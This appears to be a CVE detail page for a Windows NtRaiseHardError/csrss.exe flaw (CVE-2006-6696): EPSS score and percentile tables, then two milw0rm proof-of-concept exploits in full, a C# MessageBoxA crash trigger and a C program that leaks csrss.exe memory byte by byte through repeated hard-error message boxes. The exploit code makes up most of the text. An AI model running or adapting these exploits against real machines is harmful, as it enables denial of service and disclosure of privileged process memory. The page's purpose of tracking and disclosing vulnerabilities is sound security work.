CVE-2006-6696 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	13.11%	–	–
2022-04-03	–	–	13.11%	–	–
2022-07-17	–	–	13.11%	–	–
2022-07-24	–	–	13.11%	–	–
2022-09-25	–	–	13.11%	–	–
2023-01-01	–	–	13.11%	–	–
2023-01-22	–	–	13.11%	–	–
2023-03-12	–	–	–	63.04%	–
2023-08-13	–	–	–	65.14%	–
2023-10-08	–	–	–	65.14%	–
2024-02-18	–	–	–	57.73%	–
2024-06-02	–	–	–	57.73%	–
2024-12-22	–	–	–	47.34%	–
2025-01-19	–	–	–	47.34%	–
2025-03-18	–	–	–	–	7.47%
2025-03-30	–	–	–	–	8.56%
2025-03-30	–	–	–	–	8.56,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	91%
2022-04-03	95%
2022-07-17	96%
2022-07-24	95%
2022-09-25	96%
2023-01-01	95%
2023-01-22	96%
2023-03-12	97%
2023-08-13	97%
2023-10-08	98%
2024-02-18	98%
2024-06-02	98%
2024-12-22	98%
2025-01-19	98%
2025-03-18	91%
2025-03-30	92%
2025-03-30	92%

// mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport("user32.dll")] unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType); static unsafe void Main() { byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00}; uint MB_SERVICE_NOTIFICATION = 0x00200000u; fixed(byte* pHelloBug = &helloBug[0]) { for(int i=0; i<10; i++) MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION); } } } // >> csc /unsafe mbox.cs // >> mbox.exe // milw0rm.com [2006-12-20]

///////////////////////////////////////// ///////////////////////////////////////// ///// Microsoft Windows NtRaiseHardError ///// Csrss.exe memory disclosure ///////////////////////////////////////// ///// Ruben Santamarta ///// ruben at reversemode dot com ///// www.reversemode.com ///////////////////////////////////////// ///// 12.27.2006 ///// For educational purposes ONLY ///// Compiled using gcc (Dev-C++) //////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <winbase.h> #include <ntsecapi.h> #define UNICODE #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS ((NTSTATUS) 0x00000000) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004) #define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D) #define SystemProcessesAndThreadsInformation 5 #define NTAPI __stdcall int gLen=1; typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, ULONG, ULONG, PULONG, UINT, PULONG); typedef LONG NTSTATUS; typedef LONG KPRIORITY; typedef struct _CLIENT_ID { DWORD UniqueProcess; DWORD UniqueThread; } CLIENT_ID, * PCLIENT_ID; typedef struct _VM_COUNTERS { SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; } VM_COUNTERS; typedef struct _SYSTEM_THREAD_INFORMATION { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; LONG State; LONG WaitReason; } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD_INFORMATION Threads[5]; } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD); ULONG GetCsrssThread() { ULONG cbBuffer = 0x5000; ULONG tPointer; LPVOID pBuffer = NULL; NTSTATUS Status; PCWSTR pszProcessName; DWORD junk; ULONG ThreadCount; int i=0,b=0; PQUERYSYSTEM NtQuerySystemInformation; PSYSTEM_THREAD_INFORMATION pThreads; PSYSTEM_PROCESS_INFORMATION pInfo ; NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress( LoadLibrary( "ntdll.dll" ), "NtQuerySystemInformation" ); do { pBuffer = malloc(cbBuffer); if (pBuffer == NULL) { printf(("Not enough memory\n")); break; } Status = NtQuerySystemInformation( SystemProcessesAndThreadsInformation, pBuffer, cbBuffer, NULL); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(pBuffer); cbBuffer *= 2; } else if (!NT_SUCCESS(Status)) { printf("NtQuerySystemInformation Error! "); free(pBuffer); } } while (Status == STATUS_INFO_LENGTH_MISMATCH); pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer; for (;;) { if (pInfo->NextEntryDelta == 0) break; if(pInfo->ProcessName.Buffer!=NULL && !wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe")) { printf("\n[%ws] \n\n", pInfo->ProcessName.Buffer); printf("5 addresses for testing purposes\n\n"); for(b=0;b<5;b++) { printf("Thread %d -> 0x%x\n",b,pInfo->Threads[b].StartAddress); } tPointer=(ULONG)pInfo->Threads[1].StartAddress; } pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo) + pInfo->NextEntryDelta); } free(pBuffer); return tPointer; } VOID WINAPI ReadBox( LPVOID param ) { HWND hWindow,hButton,hText; int i=0,b=0; int gTemp; char lpTitle[300]; char lpText[300]; char lpBuff[500]; for (;;) { lpText[0]=(BYTE)""; Sleep(800); hWindow = FindWindow("#32770",NULL); if(hWindow != NULL) { GetWindowText(hWindow,(LPSTR)&lpTitle,250); hText=FindWindowEx(hWindow,0,"static",0); GetWindowText(hText,(LPSTR)&lpText,250); hText=GetNextWindow(hText,GW_HWNDNEXT); GetWindowText(hText,(LPSTR)&lpText,250); gTemp = strlen(lpTitle); if ( gTemp>1 ) gLen = gTemp; else gLen = 1; for(i = 0; i < gTemp; i++) printf("%.2X",(BYTE)lpTitle[i]); SendMessage(hWindow,WM_CLOSE,0,0); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); } } } int main() { UNICODE_STRING uStr={5,5,L"fun!"}; ULONG retValue,args[]={0,0,&uStr}; ULONG csAddr; PNTRAISE NtRaiseHardError; int i=0; system("cls"); printf("##########################################\n"); printf("### Microsoft Windows NtRaiseHardError ###\n"); printf("##### Csrss.exe memory disclosure ######\n"); printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@\n"); printf("## Ruben Santamarta www.reversemode.com ##\n"); printf("##########################################\n\n"); NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError"); csAddr=GetCsrssThread(); args[0]=csAddr; args[1]=csAddr; printf("\n[+] Capturing Messages \n"); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, NULL); printf("\n[+] Now reading at: [0x%p] - Thread 1\n\n",csAddr); for(;;) { printf("Reading bytes at [0x%p] : ",args[0]); NtRaiseHardError(0x50000018,3,4,args,1,&retValue); if(retValue && gLen<=1) printf("00\n"); else printf("\n"); args[0]+=gLen; args[1]+=gLen; } } // milw0rm.com [2006-12-27]